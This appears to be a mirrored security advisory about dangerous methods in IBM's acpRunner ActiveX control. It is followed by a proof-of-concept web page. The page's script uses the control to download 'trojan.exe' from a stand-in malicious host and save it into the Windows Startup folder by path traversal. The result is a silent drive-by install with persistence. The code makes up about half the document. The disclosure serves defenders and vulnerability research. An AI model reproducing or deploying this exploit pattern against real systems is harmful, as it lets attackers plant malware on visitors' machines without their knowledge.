21 lines
No EOL
972 B
Text
21 lines
No EOL
972 B
Text
source: https://www.securityfocus.com/bid/10561/info
|
|
|
|
It is reported that the IBM acpRunner ActiveX control contains dangerous methods that may result in a remote compromise of a system on which the ActiveX control is installed. These methods may be accessed by a malicious website and may result in the silent installation of a malicious executable.
|
|
|
|
A remote attacker may exploit this vulnerability in order to silently install a malicious executable on an affected system.
|
|
|
|
|object width="310" height="20"
|
|
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
|
|
ontrol.cab" id="runner"
|
|
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
|
|
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
|
|
AAEQIAAA==">
|
|
|object|
|
|
|
|
|script|
|
|
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
|
|
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
|
|
runner.FileSize = 96,857;
|
|
runner.FileDate = "01/09/2004 3:33";
|
|
runner.DownLoad();
|
|
|script| |